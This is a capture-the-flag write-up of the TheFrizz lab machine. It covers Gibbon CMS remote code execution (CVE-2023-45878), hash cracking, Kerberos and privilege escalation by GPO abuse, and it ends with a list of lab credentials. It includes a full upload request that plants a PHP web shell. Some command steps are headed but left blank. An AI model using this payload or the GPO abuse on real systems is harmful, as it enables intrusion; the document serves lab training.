TheFrizz writeup
TheFrizz is a hybrid box that combines web exploitation, database credential extraction, and Active Directory lateral movement. We will exploit a Gibbon CMS RCE (CVE‑2023‑45878), extract and crack hashes, use Kerberos authentication, and abuse Group Policy Objects (GPO) for privilege escalation.
Scan results uncover AD ports and also a web server on port 80.
The web server has a link to a login portal written with the Gibbon framework. The footer of that page leaks version v25.0.00.
cvedetails.com shows that this version is vulnerable to RCE: https://www.cvedetails.com/cve/CVE-2023-45878/
Exploit tutorial: https://herolab.usd.de/security-advisories/usd-2023-0025/
The following request will write the payload <?php echo system($_GET['cmd'])?> to the file asdf.php:
POST /index.php?q=/modules/System%20Admin/module_install.php HTTP/1.1
Host: thefrizz.htb
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="asdf.php"
Content-Type: application/x-php
<?php echo system($_GET['cmd'])?>
------WebKitFormBoundary--
Then establish a reverse shell:
Access the shell via the uploaded file:
In config.php, find the first set of credentials:
With MySQL access, open the database and find the gibbonperson table containing the passwords.
Recover the password using hashcat. Format the hash as [username:hash:salt]:
f.frizzle:067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489
Run hashcat:
This gives the cleartext password: Jenni_Luvs_Magic23.
Then use the credentials on Active Directory.
If you have a clock‑skew problem, synchronize with:
Generate a Kerberos configuration file and place it into /etc/krb5.conf to make interaction with Kerberos on the target easier.
Collect BloodHound data with RustHound:
Save a TGT ticket (getTGT.py is part of the Impacket toolkit):
Use Kerberos to authenticate into SSH:
Inside the C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103 directory, notice a file and its metadata.
The metadata contains the name of the file wapt-backup-sunday.
Use SCP to download that file, or place the file into the web server to download it from there if the SCP method causes a hash mismatch.
Then in conf/waptserver.ini you will find the WAPT credentials:
wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
(!suBcig@MehTed!R)
Fuzz using the decoded password in netexec, using the Kerberos auth you set up earlier:
M.SchoolBus matches!
This user can create group policies. Also, because it’s in the remote management group, we can just SSH to it.
Get a new TGT:
Move SharpGPOAbuse.exe to the target.
Create a new GPO:
New-GPO -Name "MaliciousPolicy"
Don’t target every computer to reduce noise.
Create a GPO policy for everyone to run a reverse‑shell payload.
Now force the update to be applied immediately:
gpupdate /force
Credentials
mysql:MrGibbonsDB:MisterGibbs!Parrot!?1
f.frizzle:067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489
f.frizzle:Jenni_Luvs_Magic23
secret_key = ylPYfn9tTU9IDu9yssP2luKhjQijHKvtuxIzX9aWhPyYKtRO7tMSq5sEurdTwADJ
server_uuid = 646d0847-f8b8-41c3-95bc-51873ec9ae38
token_secret_key = 5jEKVoXmYLSpi5F7plGPB4zII5fpx0cYhGKX5QC0f7dkYpYmkeTXiFlhEJtZwuwD
wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
(!suBcig@MehTed!R)
clients_signing_key = C:\wapt\conf\ca-192.168.120.158.pem
clients_signing_certificate = C:\wapt\conf\ca-192.168.120.158.crt
M.SchoolBus:!suBcig@MehTed!R